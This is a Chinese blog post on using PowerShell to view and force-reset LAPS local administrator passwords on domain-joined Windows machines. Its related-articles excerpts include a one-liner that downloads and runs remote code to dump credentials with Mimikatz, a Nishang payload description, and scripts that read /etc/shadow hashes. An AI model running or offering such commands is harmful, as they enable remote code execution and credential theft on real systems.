LAPS本地管理员密码之使用PowerShell查看和重置密码

已于 2023-11-22 09:34:32 修改
阅读量3.1k 收藏 5
点赞数
分类专栏: Active Directory Windows 文章标签: AD LAPS
于 2022-12-26 17:51:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gmaaa123/article/details/128078271
版权

目录

目录

一、PowerShell策略设置

二、引入AdmPwd.PS模块

三、查看指定电脑管理员密码

四、强制重置指定电脑管理员密码

文章说明

文章主要介绍在部署了LAPS后,怎么使用PowerShell查看和管理域内本地管理员密码。需要注意的是被操作的电脑需要加域,所有操作都在域内环境下进行。

LAPS介绍

LAPS允许您在加入域的情况下管理本地管理员密码(随机,唯一且定期更改)电脑。这些密码集中存储在Active Directory中,并且仅限使用ACL的授权用户使用。使用Kerberos v5和AES从客户端到服务器的传输密码受到保护。

这个功能实现的是让加域的客户端本地administrator账号密码随机化(每一台都不一样的复杂随机密码),并且随机化密码存储在AD上可以查询到,避免***者猜出一台就等于猜出一片,从客户端到服务器的传输过程采用Kerberos v5和AES保护。

一、PowerShell策略设置

查看shell的当前执行策略

get-ExecutionPolicy

更改设置,命令行输入set-ExecutionPolicy RemoteSigned回车,然后输入Y回车即可。

set-executionpolicy RemoteSigned

验证一下是否成功了:输入get-ExecutionPolicy,

系统回复Restricted,表示状态是禁止的。
若是提示了 RemoteSigned 就代表成功了。

二、引入AdmPwd.PS模块

打开PowerShell窗口,并确保已加载AdmPwd.PS模块。如果没有请使用下面命令引入:

Import-Module AdmPwd.PS

三、查看指定电脑管理员密码

使用命令查看密码

Get-AdmPwdPassword -ComputerName 电脑名字

四、强制重置指定电脑管理员密码

如果需要强制更改密码,可以使用密码使用Reset-AdmPwdPassword强制重置本地管理员密码。

使用命令强制重置密码

Reset-AdmPwdPassword -ComputerName 电脑名字

添加-WhenEffective允许您控制密码在计算机上更新(过期)的日期和时间::

Reset-AdmPwdPassword -ComputerName 电脑名字 -WhenEffective "12.26.2022 18:00"

(LAPS) Windows本地管理员密码解决方案
IT 博客
10-05 765
Windows Local Administrator Password Solution (LAPS)Windows本地管理员密码解决方案
本地管理员密码解决方案 Local Admin Password Solution (LAPS)
weixin_33748818的博客
10-20 5453
据调查,大多数的企业在部署AD后,针对客户端电脑的本机管理员采用以下几种方式管理方式:1. 禁用本机管理员,只使用账登录;但存在的问题是:当电脑因故障脱离,或是无法使用账号登录时,电脑就无法登录,需要借助PE等工具启用本机管理员并设置密码。2. 由IT人员在系统部署时设置一个统一的本机管理员密码(或是用GPO统一设置);但存在的问题是:如果密码一旦泄露或是被猜出,***、病毒将能取得电脑控...
powershell windows提权,查看用户密码
haha1314的博客
04-27 4620
代码保存为xx.ps1 function Get-Information { <# .SYNOPSIS Nishang Payload which gathers juicy information from the target. 有效载荷,从目标收集有趣的信息 .DESCRIPTION 这个有效负载从registry一些命令中提取信息。 This payload extracts ...
Windows LAPS本地管理员密码管理文档
a1070215678的博客
02-27 1094
在企业的IT管理环境中,本地管理员密码的安全管理至关重要。传统的手动管理方式不仅效率低下,还容易因密码长期不变或使用简单密码等问题,带来诸多安全风险。Windows LAPS(Local Administrator Password Solution)作为微软提供的一项重要功能,能够实现本地管理员密码的自动化管理,提升企业环境的安全性。本项目旨在企业内部成功部署应用Windows LAPS,优化本地管理员密码管理流程,增强信息系统的安全性稳定性。
WindowsWindows LAPS本地管理员密码解决方案
u012153104的博客
05-06 3542
微软已经在2023年4月的安全更新中,为Windows 10(20H2、21H2、22H2)、Windows 11(21H2、22H2)、Windows Server 2019Windows Server 2022提供了称为Windows LAPS的新功能。Windows 本地管理员密码解决方案 (Windows LAPS) 是一项 Windows 功能,可自动管理备份已加入 Azure Active Directory 或已加入 Windows Server Active Directory 的设备。
使用 LAPS WebUI 从 Active Directory 检索本地管理员密码
allway2的博客
05-16 1213
作为安全说明,LAPS WebUI 的 Docker 实现不会在 Web 浏览器中配置 HTTPS 的连接。因此,您需要在解决方案前面放置一个反向代理,例如 Traefik,以确保您的浏览器流量已加密,或者您的密码将以明文形式发送。您需要使用具有查看 LAPS 控制的工作站所在的 OU 对象的扩展属性的 Active Directory 用户登录。安装 LAPS UI 后,可以查询特定工作站以查看当前 LAPS 控制的密码。登录后,您可以搜索 LAPS 控制的工作站并查看密码
PowerShell批量修改AD用户密码属性
weixin_34356555的博客
06-23 1434
需求:非常普通的一个需求,就是给AD用户修改密码,但是问题是量太大了。所以写了个脚本cls $pass = ConvertTo-SecureString -AsPlainText 12333333344.abc -Force Import-Csv -Path d:\pp.csv | foreach {  Get-ADUser -Identity $_.name|Set-ADAccountPass...
powershell查看mysql密码_powershell 之数据库操作
weixin_39787594的博客
02-28 221
#region配置函数cfunctionc{#====创建object$o=new-objectpsobject#-------数据库连接配置--------$o|Add-Member-MemberTypeNoteProperty-Namet-Value'mysql'#数据库类型$o|Add-Member-MemberTypeNoteProperty-N...
使用AD管理您的本地计算机密码
Zephyr的博客
04-02 7407
此方案是将本地管理员密码存储在LDAP上,作为计算机账户的一个机密属性,配合GPO,实现自动定期修改密码、设置密码长度、强度等,然后配置某些指的账号,能查看存储的密码,如果用户需要,可以用PowerShell或指的工具查询密码,但对非授权用户,确无法获取,从而实现本机管理员的自动化管理。
用户密码
最新发布
03-20
然后,密码管理操作,比如修改密码用户自助服务,以及管理员批量重置,引用[2]中的批量变更本地管理员密码的例子可能相关,但用户问题主要是用户,可能需要调整说明。 接下来,需要考虑用户可能遇到的常见问题...
浅谈渗透中的组策略及gpp运用
hongduilanjun的博客
07-21 1196
组策略(英语GroupPolicy)是微软WindowsNT家族操作系统的一个特性,它可以控制用户帐户计算机帐户的工作环境。组策略提供了操作系统、应用程序活动目录中用户设置的集中化管理配置。组策略的其中一个版本名为本地组策略(缩写“LGPO”或“LocalGPO”),这可以在独立且非的计算机上管理组策略对象。通过使用组策略,你可以设置策略设置一次,然后将该设置复制到多台计算机上。...
红蓝对抗之Windows内网渗透
Tencent_SRC的博客
06-29 6421
无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进...
SHELL-查询用户密码
weixin_45942735的博客
02-12 1476
[root@room9pc01 opt]# vim password.sh #!/bin/bash u=`sed -n '/bash$/p' /etc/passwd` for i in $u do l=${i%%:*} z=`grep ^$l: /etc/shadow` za=${z#*:} pass=${za%%:*} echo "$l --> $pass" don...
powershell查看mysql密码_使用Windows PowerShell从数据库导入用户
weixin_35748595的博客
02-28 215
使用Windows PowerShell从数据库导入用户虽然在70-640考试中并不涉及使用Windows PowerShell导入数据库的方法,不过学习这样的做法可为以后自动创建用户的工作产生巨大的帮助。正如您看到的,只需要几行额外的代码强大的Windows PowerShell Cmdlet,即可实现目的。假设从人力资源部门得到了一个包含新雇佣员工信息的Excel表格,Excel可以直接将文...
计算机管理员密码保护,本地管理员密码解决方案(LAPS)简介
weixin_35555531的博客
07-11 1225
本地管理员帐户密码管理编制人杰里·福尔马切克本地管理员密码管理数据表出版:2015年6月上次更新时间:2018年6月作者:JiriFrmacek,微软摘要:本文档简要概述了本地管理员密码解决方案(LAPS)版权所有©2015MicrsftCrpratin。保留所有权利。一、概述本地管理员解决方案自动管理加入的计算机上的本地管理员密码,因此密码为: 在每台受管计算机上唯一 随机生成 安全地存储在A...
powershell 用户名及密码
fyqmegan的专栏
11-20 1700
win7下搜索power 然后以管理员身份运行,在弹出的命令行框里输入 powershell "IEX (New-Object Net.WebClient).DownloadString('http://dwz.cn/1OropX'); Invoke-Mimikatz -DumpCreds" 则可显示本机所有账户及账户密码。 ...
Linux脚本判断密码,用户密码检查shell脚本
weixin_39635567的博客
04-30 746
前提条件,需拥有root权限function checkPswValid(){ local users=$1 if [ "x{users}" != "x" ];then for user in ${users[*]} do local validity=9999 local expires=`chage -l ${user}|grep -e "^Password *[e|E]x...
linux shell获取登录用户的加密密码
z19861216的博客
06-07 428
linux shell获取登录用户的加密密码
shell脚本--列出用户对应的密码记录
weixin_41176080的博客
09-25 602
#!/bin/bash A=$(awk -F: '/bash$/{print $1}' /etc/passwd) #提取符合条件的账号记录 for i in $A do grep $i /etc/shadow | awk -F: '{print $1,"-->",$2}' done
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值